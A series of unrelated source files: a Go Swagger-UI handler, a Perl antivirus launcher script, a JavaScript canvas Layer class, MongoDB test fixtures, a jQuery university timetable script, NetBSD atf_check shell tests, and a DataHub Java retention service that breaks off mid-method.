package suidata3 import ( "net/http" "github.com/codemodus/swagui/internal/assets" "github.com/codemodus/swagui/internal/suihttp" ) // SUIData3 represents Swagger-UI v3 resources. type SUIData3 struct { as *assets.Assets index string def string } // New sets up a new SUIData3. func New() *SUIData3 { aliases := map[string]string{} return &SUIData3{ as: assets.New(Asset, aliases), index: "index.html", def: "https://petstore.swagger.io/v2/swagger.json", } } // Handler returns an http.Handler which serves Swagger-UI. func (d *SUIData3) Handler(notFound http.Handler, defaultDef string) http.Handler { return suihttp.Handler(d.as, notFound, d.index, d.def, defaultDef) }
#!/bin/bash if [ ! -f "CandyAntivirus.pl" ]; then cd .. fi default_dir=`pwd` export PERL5LIB=$default_dir/lib perl CandyAntivirus.pl
import {Renderer, ENV, Figure2D, Mesh2D} from '@mesh.js/core'; import {Timeline} from 'sprite-animator'; import {mat2d} from 'gl-matrix'; import {requestAnimationFrame, cancelAnimationFrame} from '../utils/animation-frame'; import Group from './group'; import ownerDocument from '../document'; import {deleteTexture} from '../utils/texture'; const defaultOptions = { antialias: true, autoRender: true, alpha: true, // for wx-miniprogram }; const _autoRender = Symbol('autoRender'); const _renderer = Symbol('renderer'); const _timeline = Symbol('timeline'); const _prepareRender = Symbol('prepareRender'); const _tickRender = Symbol('tickRender'); const _pass = Symbol('pass'); const _fbo = Symbol('fbo'); const _tickers = Symbol('tickers'); const _layerTransformInvert = Symbol('layerTransformInvert'); export default class Layer extends Group { constructor(options = {}) { super(); if(!options.canvas) { const {width, height} = this.getResolution(); const canvas = ENV.createCanvas(width, height, { offscreen: !!options.offscreen, id: options.id, extra: options.extra, }); if(canvas.style) canvas.style.position = 'absolute'; if(canvas.dataset) canvas.dataset.layerId = options.id; if(canvas.contextType) options.contextType = canvas.contextType; options.canvas = canvas; } const canvas = options.canvas; const opts = Object.assign({}, defaultOptions, options); this[_autoRender] = opts.autoRender; delete options.autoRender; const _Renderer = opts.Renderer || Renderer; this[_renderer] = new _Renderer(canvas, opts); // if(canvas.__gl__) { // // fix blendFunc for node-canvas-webgl // const gl = canvas.__gl__; // gl.blendFunc(gl.ONE, gl.ONE_MINUS_SRC_ALPHA); // } this.options = options; this.id = options.id; this[_pass] = []; this.setResolution(canvas); this.canvas = canvas; this[_timeline] = new Timeline(); this.__mouseCapturedTarget = null; this[_layerTransformInvert] = null; } get autoRender() { return this[_autoRender]; } get displayRatio() { if(this.parent && this.parent.options) { return this.parent.options.displayRatio; } return 1.0; } get height() { const {height} = this.getResolution(); return height / this.displayRatio; } get gl() { if(this.renderer.glRenderer) { return this.renderer.glRenderer.gl; } return null; } /* override */ get layer() { return this; } get offscreen() { return !!this.options.offscreen || this.canvas._offscreen; } get pass() { return this[_pass]; } get prepareRender() { return this[_prepareRender] ? this[_prepareRender] : Promise.resolve(); } /* override */ get renderer() { return this[_renderer]; } get renderOffset() { if(this.parent && this.parent.options) { const {left, top} = this.parent.options; return [left, top]; } return [this.options.left | 0, this.options.top | 0]; } get timeline() { return this[_timeline]; } get width() { const {width} = this.getResolution(); return width / this.displayRatio; } get localMatrix() { const {x, y} = this.attributes; return [1, 0, 0, 1, x, y]; } get layerTransformInvert() { if(this[_layerTransformInvert]) return this[_layerTransformInvert]; const m = this.transformMatrix; if(m[0] === 1 && m[1] === 0 && m[2] === 0 && m[3] === 1 && m[4] === 0 && m[5] === 0) { return null; } this[_layerTransformInvert] = mat2d.invert(m); return this[_layerTransformInvert]; } forceContextLoss() { const gl = this.renderer.glRenderer; if(gl) { const ext = gl.getExtension('WEBGL_lose_context'); if(ext) { ext.loseContext(); return true; } } return false; } // isPointCollision(x, y) { // return true; // } addPass({vertex, fragment, options, uniforms} = {}) { if(this.renderer.glRenderer) { const {width, height} = this.getResolution(); const program = this.renderer.createPassProgram({vertex, fragment, options}); const figure = new Figure2D(); figure.rect(0, 0, width / this.displayRatio, height / this.displayRatio); const mesh = new Mesh2D(figure); mesh.setUniforms(uniforms); mesh.setProgram(program); this[_pass].push(mesh); this.forceUpdate(); return mesh; } return null; } // delete unused texture to release memory. deleteTexture(image) { return deleteTexture(image, this.renderer); } /* override */ dispatchPointerEvent(event) { const type = event.type; if(type === 'mousedown' || type === 'mouseup' || type === 'mousemove') { const capturedTarget = this.__mouseCapturedTarget; if(capturedTarget) { if(capturedTarget.layer === this) { capturedTarget.dispatchEvent(event); return true; } this.__mouseCapturedTarget = null; } } let x, y; const layerTransformInvert = this.layerTransformInvert; if(layerTransformInvert) { x = event.x; y = event.y; const m = layerTransformInvert; const layerX = m[0] * x + m[2] * y + m[4]; const layerY = m[1] * x + m[3] * y + m[5]; delete event.x; delete event.y; delete event.layerX; delete event.layerY; Object.defineProperties(event, { layerX: { value: layerX, configurable: true, }, layerY: { value: layerY, configurable: true, }, x: { value: layerX, configurable: true, }, y: { value: layerY, configurable: true, }, }); } const ret = super.dispatchPointerEvent(event); if(layerTransformInvert) { Object.defineProperties(event, { layerX: { value: x, configurable: true, }, layerY: { value: y, configurable: true, }, x: { value: x, configurable: true, }, y: { value: y, configurable: true, }, }); } return ret; } /* override */ forceUpdate() { if(!this[_prepareRender]) { if(this.parent && this.parent.hasOffscreenCanvas) { this.parent.forceUpdate(); let _resolve = null; const prepareRender = new Promise((resolve) => { _resolve = resolve; }); prepareRender._resolve = _resolve; this[_prepareRender] = prepareRender; } else { let _resolve = null; let _requestID = null; const prepareRender = new Promise((resolve) => { _resolve = resolve; if(this[_autoRender]) { _requestID = requestAnimationFrame(() => { delete prepareRender._requestID; this.render(); }); } }); prepareRender._resolve = _resolve; prepareRender._requestID = _requestID; this[_prepareRender] = prepareRender; } } } getFBO() { const renderer = this.renderer.glRenderer; const {width, height} = this.getResolution(); if(renderer && (!this[_fbo] || this[_fbo].width !== width || this[_fbo].height !== height)) { this[_fbo] = { width, height, target: renderer.createFBO(), buffer: renderer.createFBO(), swap() { [this.target, this.buffer] = [this.buffer, this.target]; }, }; return this[_fbo]; } return this[_fbo] ? this[_fbo] : null; } updateGlobalTransform() { if(this.layerTransformInvert) { const renderer = this.renderer; const globalMatrix = renderer.__globalTransformMatrix || renderer.globalTransformMatrix; renderer.__globalTransformMatrix = globalMatrix; const mOut = mat2d(1, 0, 0, 1, 0, 0); renderer.setGlobalTransform(...mat2d.multiply(mOut, globalMatrix, this.transformMatrix)); } } /* override */ onPropertyChange(key, newValue, oldValue) { super.onPropertyChange(key, newValue, oldValue); if(key === 'zIndex') { this.canvas.style.zIndex = newValue; } if(key === 'transform' || key === 'translate' || key === 'rotate' || key === 'scale' || key === 'skew') { const m = this[_layerTransformInvert]; this[_layerTransformInvert] = null; this.updateGlobalTransform(); if(m && !this.layerTransformInvert) { // unit matrix, recover globalMatrix const renderer = this.renderer; const globalMatrix = renderer.__globalTransformMatrix || renderer.globalTransformMatrix; renderer.setGlobalTransform(...globalMatrix); } } } _prepareRenderFinished() { if(this[_prepareRender]) { if(this[_prepareRender]._requestID) { cancelAnimationFrame(this[_prepareRender]._requestID); } this[_prepareRender]._resolve(); delete this[_prepareRender]; } } render({clear = true} = {}) { const fbo = this[_pass].length ? this.getFBO() : null; if(fbo) { this.renderer.glRenderer.bindFBO(fbo.target); } if(clear) this[_renderer].clear(); const meshes = this.draw(); if(meshes && meshes.length) { this.renderer.drawMeshes(meshes); if(this.canvas.draw) this.canvas.draw(); } if(fbo) { const renderer = this.renderer.glRenderer; const len = this[_pass].length; const {width, height} = this.getResolution(); const rect = [0, 0, width / this.displayRatio, height / this.displayRatio]; this[_pass].forEach((pass, idx) => { pass.blend = true; pass.setTexture(fbo.target.texture, {rect}); if(idx === len - 1) renderer.bindFBO(null); else { fbo.swap(); renderer.bindFBO(fbo.target); } this[_renderer].clear(); this.renderer.drawMeshes([pass]); }); } this._prepareRenderFinished(); } /* override */ setResolution({width, height}) { const renderer = this.renderer; const m = renderer.__globalTransformMatrix || renderer.globalTransformMatrix; const offsetLeft = m[4]; const offsetTop = m[5]; const previousDisplayRatio = m[0]; const {width: w, height: h} = this.getResolution(); if(w !== width || h !== height) { super.setResolution({width, height}); if(this.canvas) { this.canvas.width = width; this.canvas.height = height; if(renderer.updateResolution) renderer.updateResolution(); } this.attributes.size = [width, height]; if(this[_pass].length) { this[_pass].forEach((pass) => { const figure = new Figure2D(); figure.rect(0, 0, width / this.displayRatio, height / this.displayRatio); pass.contours = figure.contours; }); } // this.dispatchEvent({type: 'resolutionchange', width, height}); } const [left, top] = this.renderOffset; const displayRatio = this.displayRatio; if(offsetLeft !== left || offsetTop !== top || previousDisplayRatio !== displayRatio) { // console.log(displayRatio, this.parent); renderer.setGlobalTransform(displayRatio, 0, 0, displayRatio, left, top); renderer.__globalTransformMatrix = null; this[_layerTransformInvert] = null; this.updateGlobalTransform(); this.forceUpdate(); } } /** * tick(handler, {originTime = 0, playbackRate = 1.0, duration = Infinity}) * @param {*} handler * @param {*} options */ tick(handler = null, {duration = Infinity, ...timelineOptions} = {}) { // this._prepareRenderFinished(); const t = this.timeline.fork(timelineOptions); const layer = this; this[_tickers] = this[_tickers] || []; this[_tickers].push({handler, duration}); const update = () => { let _resolve = null; let _requestID = null; const _update = () => { // const ret = handler ? handler(t.currentTime, p) : null; const ret = this[_tickers].map(({handler, duration}) => { const p = Math.min(1.0, t.currentTime / duration); const value = handler ? handler(t.currentTime, p) : null; return {value, p}; }); if(layer[_autoRender] && !layer[_tickRender]) { layer[_tickRender] = Promise.resolve().then(() => { layer.render(); delete layer[_tickRender]; for(let i = ret.length - 1; i >= 0; i--) { const {value, p} = ret[i]; if(value === false || p >= 1.0) { this[_tickers].splice(i, 1); } } if(this[_tickers].length > 0) { update(); } }); } }; if(this[_prepareRender] && this[_prepareRender]._type !== 'ticker') { cancelAnimationFrame(this[_prepareRender]._requestID); delete this[_prepareRender]; } if(!this[_prepareRender]) { const prepareRender = new Promise((resolve) => { _resolve = resolve; _requestID = requestAnimationFrame(_update); }); prepareRender._resolve = _resolve; prepareRender._requestID = _requestID; prepareRender._type = 'ticker'; this[_prepareRender] = prepareRender; } }; update(); } toGlobalPos(x, y) { if(this.layerTransformInvert) { const m = this.transformMatrix; x = m[0] * x + m[2] * y + m[4]; y = m[1] * x + m[3] * y + m[5]; } const {width, height} = this.getResolution(); const offset = this.renderOffset; const viewport = [this.canvas.clientWidth, this.canvas.clientHeight]; x = x * viewport[0] / width + offset[0]; y = y * viewport[1] / height + offset[1]; const displayRatio = this.displayRatio; x *= displayRatio; y *= displayRatio; return [x, y]; } toLocalPos(x, y) { const {width, height} = this.getResolution(); const offset = this.renderOffset; const viewport = [this.canvas.clientWidth, this.canvas.clientHeight]; x = x * width / viewport[0] - offset[0]; y = y * height / viewport[1] - offset[1]; const displayRatio = this.displayRatio; x /= displayRatio; y /= displayRatio; const m = this.layerTransformInvert; if(m) { x = m[0] * x + m[2] * y + m[4]; y = m[1] * x + m[3] * y + m[5]; } return [x, y]; } } ownerDocument.registerNode(Layer, 'layer');
import { ObjectId } from 'mongodb'; import { UserDocument } from '../models/User'; const userOne: Required<UserDocument> = { _id: new ObjectId('aaaaaaaaaaaaaaaaaaaaaaaa'), uuid: 'aa9696ee-4bf3-4aa0-b38e-f5fdc540a4a0', createdAt: new Date('2021-11-16 18:32:45.110Z'), updatedAt: new Date('2021-11-16 18:32:45.110Z'), bucketId: '---', }; const userTwo: Required<UserDocument> = { _id: new ObjectId('aaaaaaaaaaaaaaaaaaaaaaab'), uuid: '2148255a-289e-425b-a29d-6e4b0c2dc2bb', createdAt: new Date('2021-11-16 18:32:45.110Z'), updatedAt: new Date('2021-11-16 18:32:45.110Z'), bucketId: '---' }; export const users: Required<UserDocument>[] = [userOne, userTwo];
<filename>js/my-courses.js function noticeMyCourses() { let UserCourses = localStorage.getItem("UserCourses"); if (UserCourses) { UserCourses = JSON.parse(UserCourses); const date = new Date(); const hour = date.getHours(); const min = date.getMinutes(); const day = date.getDay(); let next_period = ""; if (hour == 8 && 50 < min || hour == 9 || hour == 10 && min <= 30) { next_period = "1"; } else if (hour == 10 && 30 < min || hour == 11 || hour == 12 && min <= 10) { next_period = "2"; } else if (hour == 12 && 50 < min || hour == 13 || hour == 14 && min <= 30) { next_period = "3"; } else if (hour == 14 && 35 < min || hour == 15 || hour == 16 && min <= 15) { next_period = "4"; } else if (hour == 16 && 20 < min || hour == 17 || hour == 18 && min == 0) { next_period = "5"; } else if (hour == 18 && 5 < min || hour == 19 && min <= 45) { next_period = "6"; } const next_flag = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"][day] + next_period; let i = 0; while (i < UserCourses.length) { if (UserCourses[i]["period"] === next_flag) { let name = "(Course name not found)"; if (UserCourses[i]["name"]) { name = UserCourses[i]["name"]; } let teacher = "(Teacher name not found)"; if (UserCourses[i]["teacher"]) { teacher = UserCourses[i]["teacher"]; } const time = ["09:00~10:30", "10:40~12:10", "13:00~14:30", "14:45~16:15", "16:30~18:00", "18:15~19:45"][next_period - 1]; let classroom = "(Classroom not found)"; if (UserCourses[i]["classroom"]) { classroom = UserCourses[i]["classroom"]; } let url = "#"; if (UserCourses[i]["url"]) { url = UserCourses[i]["url"]; } const html = '<div class="well my-course bg-primary" style="background-color:#3c8dbc;border-color:#367fa9;margin-top: 30px;"><div class="media">' + '<div class="media-body media-middle"><p><i class="fa fa-angle-double-right"></i> Now</p>' + '<h4 class="media-heading">' + name + '</h4>' + '<i class="fa fa-graduation-cap"></i> ' + teacher + ' <i class="fa fa-clock-o"></i> ' + time + ' <i class="fa fa-map-marker"></i> ' + classroom + ' <i class="fa fa-link"></i> <a href="' + url + '" target="_blank" class="my-course" style="color:#fff;">' + url + '</a>' + '</div></div></div>'; $(html).appendTo(".content-header"); } i = (i + 1) | 0; } } } function showMyCourses(year) { $(".content-header").html('<h1>List of My Courses</h1><ol class="breadcrumb"><li><i class="fa fa-dashboard"></i> ' + year + '</li><li class="active">My Courses</li></ol>'); let html = '<div class="panel pad-form"><table class="table table-bordered" style="table-layout:fixed;height:10px;">'; html += '<thead><tr><th style="width:55px;">#</th><th class="text-center">Mon</th><th class="text-center">Tue</th><th class="text-center">Wed</th><th class="text-center">Thu</th><th class="text-center">Fri</th><th class="text-center">Sat</th></tr></thead>'; html += '<tbody>'; const time_list = ["09:00~10:30", "10:40~12:10", "13:00~14:30", "14:45~16:15", "16:30~18:00", "18:15~19:45"]; const day_list = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]; let n = 0; while (n < 6) { html += '<tr><th scope="row"><p class="text-primary">' + (n + 1) + '</p>' + time_list[n] + '</th>'; let i = 0 while (i < 6) { html += '<td><a id="' + day_list[i] + (n + 1) + '" class="list-group-item my-courses" style="height:100%;cursor:pointer;"></a></td>'; i = (i + 1) | 0; } html += '</tr>'; n = (n + 1) | 0; } html += '</tbody>'; html += '</table></div>'; $(".content").html(html); let UserCourses = localStorage.getItem("UserCourses"); if (UserCourses) { UserCourses = JSON.parse(UserCourses); let i = 0; while (i < UserCourses.length) { let name = "(Course name not found)"; if (UserCourses[i]["name"]) { name = UserCourses[i]["name"]; } let teacher = "(Teacher name not found)"; if (UserCourses[i]["teacher"]) { teacher = UserCourses[i]["teacher"]; } const period = UserCourses[i]["period"]; let classroom = "(Classroom not found)"; if (UserCourses[i]["classroom"]) { classroom = UserCourses[i]["classroom"]; } let url = "#"; if (UserCourses[i]["url"]) { url = UserCourses[i]["url"]; } const html = '<h4 class="text-primary course-name">' + name + '</h4>' + '<ul style="list-style:none;padding-left:0;">' + '<li><i class="fa fa-graduation-cap" style="margin-right:1.5px;"></i>' + teacher + '</li>' + '<li><i class="fa fa-map-marker" style="margin-left:5px;margin-right:6px;"></i>' + classroom + '</li>' + '</ul>'; $("#" + period).html(html); i = (i + 1) | 0; } } $("a.my-courses").on('click', function () { if ($(this).children(".course-name").length == 1) { $.getJSON( "https://api.tera-chan.com/api/v0.php/terachan:INIADSyllabus?terachan:courseYear=" + year + "&terachan:courseTitle.ja=" + $(this).children(".course-name").text(), function (json) { if (json.length === 1) { showModal(json[0]["terachan:courseWeek"] + json[0]["terachan:coursePeriod"], '<iframe src="' + "https://g-sys.toyo.ac.jp/syllabus/html/gakugai/" + year + "/" + year + "_" + json[0]["terachan:syllabusNo"]["ja"] + ".html" + '" style="width:100%;height:100%;border:0;"></iframe>'); } else { alert("この科目の詳細なシラバスは提供されていません。\nDetailed syllabuses for this course are not available."); } }) } else { const id = $(this).attr("id"); $.getJSON( "https://api.tera-chan.com/api/v0.php/terachan:INIADSyllabus?terachan:courseYear=" + year + "&terachan:courseWeek=" + id.slice(0, 3) + "&terachan:coursePeriod=" + id.slice(-1), function (json) { let html = '<p>開講されている科目はありません。<br>There are no courses offered.</p>'; if (json.length > 0) { html = '<p>' + json.length + '科目が開講されています。クリックすると詳細なシラバスを確認できます。<br>'; html += json.length + ' courses are offered in this period. Click each course to see the detailed syllabus.</p>'; html += '<div class="list-group">'; let i = 0; while (i < json.length) { let syllabus_url = "javascript:alert(\'この科目の詳細なシラバスは提供されていません。\nDetailed syllabuses for this course are not available.\');"; if (json[i]["terachan:syllabusNo"]["en"]) { syllabus_url = "https://g-sys.toyo.ac.jp/syllabus/html/gakugai/" + json[i]["terachan:courseYear"] + "/" + json[i]["terachan:courseYear"] + "_" + json[i]["terachan:syllabusNo"]["en"] + ".html"; } if (json[i]["terachan:syllabusNo"]["ja"]) { syllabus_url = "https://g-sys.toyo.ac.jp/syllabus/html/gakugai/" + json[i]["terachan:courseYear"] + "/" + json[i]["terachan:courseYear"] + "_" + json[i]["terachan:syllabusNo"]["ja"] + ".html"; } const semester=json[i]["terachan:courseSemester"] const title = json[i]["terachan:courseTitle"]["ja"]; let instructor_name = json[i]["terachan:instructorName"]; if (instructor_name.length > 1) { instructor_name =instructor_name[0]["ja"]+" 他" } else { instructor_name =instructor_name[0]["ja"]; } let study_year = json[i]["terachan:courseStudyYear"]; study_year = study_year[0] + "~" + study_year[study_year.length - 1]; const language = { "Japanese": "日本語", "English": "English", "Other Languages": "Other Languages", "Foreign Language Course":"言語科目" }[json[i]["terachan:courseLanguage"]]; html += '<a class="list-group-item" href="' + syllabus_url + '" target="_blank"><h4 class="text-primary">' + title + '</h4>' + '<ul class="list-inline">' + '<li><i class="fa fa-calendar" style="margin-right:3px;"></i>' + semester + '</li>' + '<i class="fa fa-graduation-cap" style="margin-right:1.5px;"></i>' + instructor_name + '</li>' + '<li><i class="fa fa-user-circle" style="margin-right:3px;"></i>' + study_year + '</li>' + '<li><i class="fa fa-language" style="margin-right:3px;"></i>' + language + '</li>' + '</ul>'; i = (i + 1) | 0; } html += '</div>'; } showModal(id, html); }) } }); }
# # Automated Testing Framework (atf) # # Copyright (c) 2007 The NetBSD Foundation, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND # CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN # IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # TODO: Bring in the checks in the bootstrap testsuite for atf_check. atf_test_case info_ok info_ok_head() { atf_set "descr" "Verifies that atf_check prints an informative" \ "message even when the command is successful" } info_ok_body() { h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)" atf_check -s eq:0 -o save:stdout -e save:stderr -x \ "${h} atf_check_info_ok" grep 'Executing command.*true' stdout >/dev/null || \ atf_fail "atf_check does not print an informative message" atf_check -s eq:0 -o save:stdout -e save:stderr -x \ "${h} atf_check_info_fail" grep 'Executing command.*false' stdout >/dev/null || \ atf_fail "atf_check does not print an informative message" } atf_test_case expout_mismatch expout_mismatch_head() { atf_set "descr" "Verifies that atf_check prints a diff of the" \ "stdout and the expected stdout of the two do not" \ "match" } expout_mismatch_body() { h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)" atf_check -s eq:1 -o save:stdout -e save:stderr -x \ "${h} atf_check_expout_mismatch" grep 'Executing command.*echo bar' stdout >/dev/null || \ atf_fail "atf_check does not print an informative message" grep 'stdout does not match golden output' stderr >/dev/null || \ atf_fail "atf_check does not print the stdout header" grep 'stderr' stderr >/dev/null && \ atf_fail "atf_check prints the stderr header" grep '^-foo' stderr >/dev/null || \ atf_fail "atf_check does not print the stdout's diff" grep '^+bar' stderr >/dev/null || \ atf_fail "atf_check does not print the stdout's diff" } atf_test_case experr_mismatch experr_mismatch_head() { atf_set "descr" "Verifies that atf_check prints a diff of the" \ "stderr and the expected stderr of the two do not" \ "match" } experr_mismatch_body() { h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)" atf_check -s eq:1 -o save:stdout -e save:stderr -x \ "${h} atf_check_experr_mismatch" grep 'Executing command.*echo bar' stdout >/dev/null || \ atf_fail "atf_check does not print an informative message" grep 'stdout' stderr >/dev/null && \ atf_fail "atf_check prints the stdout header" grep 'stderr does not match golden output' stderr >/dev/null || \ atf_fail "atf_check does not print the stderr header" grep '^-foo' stderr >/dev/null || \ atf_fail "atf_check does not print the stderr's diff" grep '^+bar' stderr >/dev/null || \ atf_fail "atf_check does not print the stderr's diff" } atf_test_case null_stdout null_stdout_head() { atf_set "descr" "Verifies that atf_check prints a the stdout it got" \ "when it was supposed to be null" } null_stdout_body() { h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)" atf_check -s eq:1 -o save:stdout -e save:stderr -x \ "${h} atf_check_null_stdout" grep 'Executing command.*echo.*These.*contents' stdout >/dev/null || \ atf_fail "atf_check does not print an informative message" grep 'stdout not empty' stderr >/dev/null || \ atf_fail "atf_check does not print the stdout header" grep 'stderr' stderr >/dev/null && \ atf_fail "atf_check prints the stderr header" grep 'These are the contents' stderr >/dev/null || \ atf_fail "atf_check does not print stdout's contents" } atf_test_case null_stderr null_stderr_head() { atf_set "descr" "Verifies that atf_check prints a the stderr it got" \ "when it was supposed to be null" } null_stderr_body() { h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)" atf_check -s eq:1 -o save:stdout -e save:stderr -x \ "${h} atf_check_null_stderr" grep 'Executing command.*echo.*These.*contents' stdout >/dev/null || \ atf_fail "atf_check does not print an informative message" grep 'stdout' stderr >/dev/null && \ atf_fail "atf_check prints the stdout header" grep 'stderr not empty' stderr >/dev/null || \ atf_fail "atf_check does not print the stderr header" grep 'These are the contents' stderr >/dev/null || \ atf_fail "atf_check does not print stderr's contents" } atf_test_case equal equal_head() { atf_set "descr" "Verifies that atf_check_equal works" } equal_body() { h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)" atf_check -s eq:0 -o ignore -e ignore -x "${h} atf_check_equal_ok" atf_check -s eq:1 -o ignore -e ignore -x \ "${h} -r resfile atf_check_equal_fail" atf_check -s eq:0 -o ignore -e empty grep '^failed: a != b (a != b)$' \ resfile atf_check -s eq:0 -o ignore -e ignore -x "${h} atf_check_equal_eval_ok" atf_check -s eq:1 -o ignore -e ignore -x \ "${h} -r resfile atf_check_equal_eval_fail" atf_check -s eq:0 -o ignore -e empty \ grep '^failed: \${x} != \${y} (a != b)$' resfile } atf_init_test_cases() { atf_add_test_case info_ok atf_add_test_case expout_mismatch atf_add_test_case experr_mismatch atf_add_test_case null_stdout atf_add_test_case null_stderr atf_add_test_case equal } # vim: syntax=sh:expandtab:shiftwidth=4:softtabstop=4
<filename>metadata-io/src/main/java/com/linkedin/metadata/entity/RetentionService.java package com.linkedin.metadata.entity; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableSet; import com.linkedin.common.AuditStamp; import com.linkedin.common.urn.Urn; import com.linkedin.data.template.RecordTemplate; import com.linkedin.events.metadata.ChangeType; import com.linkedin.metadata.Constants; import com.linkedin.metadata.key.DataHubRetentionKey; import com.linkedin.metadata.utils.EntityKeyUtils; import com.linkedin.metadata.utils.GenericRecordUtils; import com.linkedin.mxe.GenericAspect; import com.linkedin.mxe.MetadataChangeProposal; import com.linkedin.retention.DataHubRetentionConfig; import com.linkedin.retention.Retention; import java.util.Collections; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.concurrent.CompletableFuture; import java.util.stream.Collectors; import javax.annotation.Nonnull; import javax.annotation.Nullable; import lombok.SneakyThrows; import lombok.Value; /** * Service coupled with an {@link EntityService} to handle aspect record retention. * * TODO: This class is abstract with storage-specific implementations. It'd be nice to pull storage and retention * concerns apart, let (into {@link AspectDao}) deal with storage, and merge all retention concerns into a single * class. */ public abstract class RetentionService { protected static final String ALL = "*"; protected static final String DATAHUB_RETENTION_ENTITY = "dataHubRetention"; protected static final String DATAHUB_RETENTION_ASPECT = "dataHubRetentionConfig"; protected static final String DATAHUB_RETENTION_KEY_ASPECT = "dataHubRetentionKey"; protected abstract EntityService getEntityService(); /** * Fetch retention policies given the entityName and aspectName * Uses the entity service to fetch the latest retention policies set for the input entity and aspect * * @param entityName Name of the entity * @param aspectName Name of the aspect * @return retention policies to apply to the input entity and aspect */ public Retention getRetention(@Nonnull String entityName, @Nonnull String aspectName) { // Prioritized list of retention keys to fetch List<Urn> retentionUrns = getRetentionKeys(entityName, aspectName); Map<Urn, List<RecordTemplate>> fetchedAspects = getEntityService().getLatestAspects(new HashSet<>(retentionUrns), ImmutableSet.of(DATAHUB_RETENTION_ASPECT)); // Find the first retention info that is set among the prioritized list of retention keys above Optional<DataHubRetentionConfig> retentionInfo = retentionUrns.stream() .flatMap(urn -> fetchedAspects.getOrDefault(urn, Collections.emptyList()) .stream() .filter(aspect -> aspect instanceof DataHubRetentionConfig)) .map(retention -> (DataHubRetentionConfig) retention) .findFirst(); return retentionInfo.map(DataHubRetentionConfig::getRetention).orElse(new Retention()); } // Get list of datahub retention keys that match the input entity name and aspect name protected List<Urn> getRetentionKeys(@Nonnull String entityName, @Nonnull String aspectName) { return ImmutableList.of( new DataHubRetentionKey().setEntityName(entityName).setAspectName(aspectName), new DataHubRetentionKey().setEntityName(entityName).setAspectName(ALL), new DataHubRetentionKey().setEntityName(ALL).setAspectName(aspectName), new DataHubRetentionKey().setEntityName(ALL).setAspectName(ALL)) .stream() .map(key -> EntityKeyUtils.convertEntityKeyToUrn(key, DATAHUB_RETENTION_ENTITY)) .collect(Collectors.toList()); } /** * Set retention policy for given entity and aspect. If entity or aspect names are null, the policy is set as default * * @param entityName Entity name to apply policy to. If null, set as "*", * meaning it will be the default for any entities without specified policy * @param aspectName Aspect name to apply policy to. If null, set as "*", * meaning it will be the default for any aspects without specified policy * @param retentionConfig Retention policy */ @SneakyThrows public boolean setRetention(@Nullable String entityName, @Nullable String aspectName, @Nonnull DataHubRetentionConfig retentionConfig) { validateRetention(retentionConfig.getRetention()); DataHubRetentionKey retentionKey = new DataHubRetentionKey(); retentionKey.setEntityName(entityName != null ? entityName : ALL); retentionKey.setAspectName(aspectName != null ? aspectName : ALL); Urn retentionUrn = EntityKeyUtils.convertEntityKeyToUrn(retentionKey, DATAHUB_RETENTION_ENTITY); MetadataChangeProposal keyProposal = new MetadataChangeProposal(); GenericAspect keyAspect = GenericRecordUtils.serializeAspect(retentionKey); keyProposal.setAspect(keyAspect); keyProposal.setAspectName(DATAHUB_RETENTION_KEY_ASPECT); keyProposal.setEntityType(DATAHUB_RETENTION_ENTITY); keyProposal.setChangeType(ChangeType.UPSERT); keyProposal.setEntityUrn(retentionUrn); AuditStamp auditStamp = new AuditStamp().setActor(Urn.createFromString(Constants.SYSTEM_ACTOR)).setTime(System.currentTimeMillis()); getEntityService().ingestProposal(keyProposal, auditStamp); MetadataChangeProposal aspectProposal = keyProposal.clone(); GenericAspect retentionAspect = GenericRecordUtils.serializeAspect(retentionConfig); aspectProposal.setAspect(retentionAspect); aspectProposal.setAspectName(DATAHUB_RETENTION_ASPECT); return getEntityService().ingestProposal(aspectProposal, auditStamp).isDidUpdate(); } /** * Delete the retention policy set for given entity and aspect. * * @param entityName Entity name to apply policy to. If null, set as "*", * meaning it will delete the default policy for any entities without specified policy * @param aspectName Aspect name to apply policy to. If null, set as "*", * meaning it will delete the default policy for any aspects without specified policy */ public void deleteRetention(@Nullable String entityName, @Nullable String aspectName) { DataHubRetentionKey retentionKey = new DataHubRetentionKey(); retentionKey.setEntityName(entityName != null ? entityName : ALL); retentionKey.setAspectName(aspectName != null ? aspectName : ALL); Urn retentionUrn = EntityKeyUtils.convertEntityKeyToUrn(retentionKey, DATAHUB_RETENTION_ENTITY); getEntityService().deleteUrn(retentionUrn); } private void validateRetention(Retention retention) { if (retention.hasVersion()) { if (retention.getVersion().getMaxVersions() <= 0) { throw new IllegalArgumentException("Invalid maxVersions: " + retention.getVersion().getMaxVersions()); } } if (retention.hasTime()) { if (retention.getTime().getMaxAgeInSeconds() <= 0) { throw new 